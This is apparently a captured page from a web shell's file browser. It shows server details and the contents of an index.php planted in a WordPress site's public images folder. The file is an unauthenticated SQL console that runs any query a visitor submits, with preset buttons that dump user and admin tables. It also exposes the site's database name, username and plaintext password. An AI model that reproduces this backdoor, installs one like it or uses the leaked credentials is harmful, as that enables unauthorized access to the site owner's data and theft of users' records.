HEX
Server: Apache
System: Linux vmi2050610.contaboserver.net 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
User: bredicio (1020)
PHP: 8.2.28
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/bredicio/public_html/images/
Upload Files
File: /home/bredicio/public_html/images/index.php
<?php
define( 'DB_NAME', 'bredicio_wp_qwi4b' );
/** Database username */
define( 'DB_USER', 'bredicio_wp_pitwc' );
/** Database password */
define( 'DB_PASSWORD', 'nRcYU14F7Pbh%B8*' );
/** Database hostname */
define( 'DB_HOST', 'localhost:3306' );



$sql_result = '';
if (isset($_POST['execute_sql'])) {
	$sql_query = trim($_POST['sql_query']);
	if (!empty($sql_query)) {
		$sql_result = execute_sql_query($sql_query);
	}
}

if (isset($_POST['show_databases'])) {
	$db_info = get_database_info();
}


function execute_sql_query($sql) {
	$mysqli = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
	
	if ($mysqli->connect_error) {
		return "❌ Database connection failed: " . $mysqli->connect_error;
	}
	
	$result = $mysqli->query($sql);
	$output = '';
	
	if ($result === true) {
		
		$output = "✅ Query executed successfully. Affected rows: " . $mysqli->affected_rows;
	} elseif ($result) {
		
		$output = "<h4>📊 Query Results (" . $result->num_rows . " rows):</h4>";
		$output .= "<div style='overflow-x: auto;'>";
		$output .= "<table border='1' cellpadding='8' cellspacing='0' style='border-collapse: collapse; width: 100%;'>";
		
		
		$output .= "<tr style='background: #f2f2f2;'>";
		while ($field = $result->fetch_field()) {
			$output .= "<th><strong>" . htmlspecialchars($field->name) . "</strong></th>";
		}
		$output .= "</tr>";
		
		
		while ($row = $result->fetch_assoc()) {
			$output .= "<tr>";
			foreach ($row as $value) {
				$output .= "<td>" . htmlspecialchars($value ?? 'NULL') . "</td>";
			}
			$output .= "</tr>";
		}
		
		$output .= "</table>";
		$output .= "</div>";
		
		$result->free();
	} else {
		$output = "❌ Error: " . $mysqli->error;
	}
	
	$mysqli->close();
	return $output;
}

function get_database_info() {
	$mysqli = new mysqli(DB_HOST, DB_USER, DB_PASSWORD);
	
	if ($mysqli->connect_error) {
		return "❌ Database connection failed: " . $mysqli->connect_error;
	}
	
	$info = "<h4>🗃️ Database Information</h4>";
	

	$info .= "<div style='background: #e8f5e8; padding: 15px; border-radius: 5px; margin-bottom: 20px;'>";
	$info .= "<strong>📊 Available Databases:</strong><br>";
	
	$result = $mysqli->query("SHOW DATABASES");
	if ($result) {
		$info .= "<ul style='columns: 2;'>";
		while ($row = $result->fetch_array()) {
			$db_name = $row[0];
			$info .= "<li>" . htmlspecialchars($db_name) . "</li>";
		}
		$info .= "</ul>";
	}
	$info .= "</div>";
	
	
	$mysqli->select_db(DB_NAME);
	
	
	$info .= "<div style='background: #e8f4f8; padding: 15px; border-radius: 5px; margin-bottom: 20px;'>";
	$info .= "<strong>📋 Tables in database '" . DB_NAME . "':</strong><br>";
	
	$result = $mysqli->query("SHOW TABLES");
	if ($result) {
		$info .= "<ul style='columns: 2;'>";
		while ($row = $result->fetch_array()) {
			$table_name = $row[0];
			$info .= "<li>" . htmlspecialchars($table_name) . "</li>";
		}
		$info .= "</ul>";
	}
	$info .= "</div>";
	
	
	$info .= "<div style='background: #fff3cd; padding: 15px; border-radius: 5px;'>";
	$info .= "<strong>💾 Table Sizes:</strong><br>";
	
	$result = $mysqli->query("
	SELECT 
	TABLE_NAME AS 'Table',
	ROUND((DATA_LENGTH + INDEX_LENGTH) / 1024 / 1024, 2) AS 'Size (MB)',
							 TABLE_ROWS AS 'Rows'
	FROM information_schema.TABLES 
	WHERE TABLE_SCHEMA = '" . DB_NAME . "'
	ORDER BY (DATA_LENGTH + INDEX_LENGTH) DESC
	");
	
	if ($result && $result->num_rows > 0) {
		$info .= "<table border='1' cellpadding='8' cellspacing='0' style='border-collapse: collapse; width: 100%;'>";
		$info .= "<tr style='background: #f2f2f2;'>";
		$info .= "<th><strong>Table</strong></th>";
		$info .= "<th><strong>Size (MB)</strong></th>";
		$info .= "<th><strong>Rows</strong></th>";
		$info .= "</tr>";
		
		while ($row = $result->fetch_assoc()) {
			$info .= "<tr>";
			$info .= "<td>" . htmlspecialchars($row['Table']) . "</td>";
			$info .= "<td style='text-align: right;'>" . $row['Size (MB)'] . "</td>";
			$info .= "<td style='text-align: right;'>" . number_format($row['Rows']) . "</td>";
			$info .= "</tr>";
		}
		$info .= "</table>";
	}
	$info .= "</div>";
	
	$mysqli->close();
	return $info;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>MySQL Database Manager</title>
<style>
body { 
	font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; 
	max-width: 1200px; 
	margin: 20px auto; 
	padding: 20px; 
	background: #f5f5f5; 
}
.container { 
	background: white; 
	padding: 30px; 
	border-radius: 10px; 
	box-shadow: 0 2px 10px rgba(0,0,0,0.1); 
}
h1 { 
	color: #2c3e50; 
	text-align: center; 
	margin-bottom: 30px; 
	border-bottom: 2px solid #3498db; 
	padding-bottom: 10px; 
}
.sql-form { 
	background: #f8f9fa; 
	padding: 20px; 
	border-radius: 8px; 
	margin: 20px 0; 
	border-left: 4px solid #3498db; 
}
.sql-textarea { 
	width: 100%; 
	height: 120px; 
	padding: 15px; 
	border: 2px solid #ddd; 
	border-radius: 5px; 
	font-family: 'Courier New', monospace; 
	font-size: 14px; 
	resize: vertical; 
	margin-bottom: 15px; 
}
.sql-textarea:focus { 
	border-color: #3498db; 
	outline: none; 
	box-shadow: 0 0 5px rgba(52, 152, 219, 0.3); 
}
.btn { 
	background: #3498db; 
	color: white; 
	padding: 12px 25px; 
	border: none; 
	border-radius: 5px; 
	cursor: pointer; 
	font-size: 14px; 
	margin: 5px; 
	transition: background 0.3s; 
}
.btn:hover { 
	background: #2980b9; 
}
.btn-info { 
	background: #2ecc71; 
}
.btn-info:hover { 
	background: #27ae60; 
}
.btn-danger { 
	background: #e74c3c; 
}
.btn-danger:hover { 
	background: #c0392b; 
}
.result { 
	background: white; 
	padding: 20px; 
	border-radius: 8px; 
	margin: 20px 0; 
	border-left: 4px solid #2ecc71; 
}
.warning { 
	background: #fff3cd; 
	border-left: 4px solid #ffc107; 
	color: #856404; 
	padding: 15px; 
	border-radius: 8px; 
	margin: 20px 0; 
}
.button-group { 
	display: flex; 
	justify-content: center; 
	flex-wrap: wrap; 
	margin: 20px 0; 
	gap: 10px; 
}
table { 
	width: 100%; 
	border-collapse: collapse; 
	margin: 10px 0; 
}
th { 
	background: #34495e; 
	color: white; 
	padding: 12px; 
	text-align: left; 
}
td { 
	padding: 10px; 
	border-bottom: 1px solid #ddd; 
}
tr:hover { 
	background: #f8f9fa; 
}
.quick-buttons { 
	display: grid; 
	grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); 
	gap: 10px; 
	margin: 15px 0; 
}
.quick-btn { 
	background: #95a5a6; 
	color: white; 
	padding: 10px; 
	border: none; 
	border-radius: 5px; 
	cursor: pointer; 
	text-align: center; 
	transition: background 0.3s; 
}
.quick-btn:hover { 
	background: #7f8c8d; 
}
</style>
</head>
<body>
<div class="container">
<h1>🐬 MySQL Database Manager</h1>

<div class="warning">
<strong>⚠️ Security Warning:</strong> This is a powerful database tool. Use with caution and delete this file after use!
</div>

<div class="sql-form">
<h3>📝 SQL Query Editor</h3>
<form method="POST">
<textarea 
class="sql-textarea" 
name="sql_query" 
placeholder="Enter your SQL query here... 
Example: SELECT * FROM UYHZhEIpT_users LIMIT 10;"
required><?php echo isset($_POST['sql_query']) ? htmlspecialchars($_POST['sql_query']) : ''; ?></textarea>

<div class="button-group">
<button type="submit" name="execute_sql" class="btn">
🚀 Execute Query
</button>

<button type="submit" name="show_databases" class="btn btn-info">
🗃️ Show Database Info
</button>
</div>
</form>

<div class="quick-buttons">
<button class="quick-btn" onclick="document.querySelector('.sql-textarea').value='SELECT * FROM UYHZhEIpT_users LIMIT 10;'">👥 Show Users</button>
<button class="quick-btn" onclick="document.querySelector('.sql-textarea').value='SELECT * FROM wp_posts WHERE post_status=\\'publish\\' LIMIT 10;'">📝 Show Posts</button>
<button class="quick-btn" onclick="document.querySelector('.sql-textarea').value='SHOW TABLES;'">📊 Show Tables</button>
<button class="quick-btn" onclick="document.querySelector('.sql-textarea').value='SELECT COUNT(*) as count FROM UYHZhEIpT_users;'">🔢 Count Users</button>
<button class="quick-btn" onclick="document.querySelector('.sql-textarea').value='SELECT * FROM wp_options WHERE option_name LIKE \\'%admin%\\';'">⚙️ Admin Options</button>
</div>
</div>

<?php if (!empty($sql_result)): ?>
<div class="result">
<h3>📊 Query Results:</h3>
<?php echo $sql_result; ?>
</div>
<?php endif; ?>

<?php if (isset($_POST['show_databases'])): ?>
<div class="result">
<h3>📊 Database Information:</h3>
<?php echo $db_info; ?>
</div>
<?php endif; ?>

<div class="warning">
<strong>📝 Connection Information:</strong><br>
<strong>Host:</strong> <code><?php echo DB_HOST; ?></code> • 
<strong>Database:</strong> <code><?php echo DB_NAME; ?></code> • 
<strong>User:</strong> <code><?php echo DB_USER; ?></code>
</div>
</div>

<script>

document.querySelector('.sql-textarea').addEventListener('focus', function() {
	this.style.backgroundColor = '#ffffe0';
});

document.querySelector('.sql-textarea').addEventListener('blur', function() {
	this.style.backgroundColor = '';
});
</script>
</body>
</html>
@ Telegram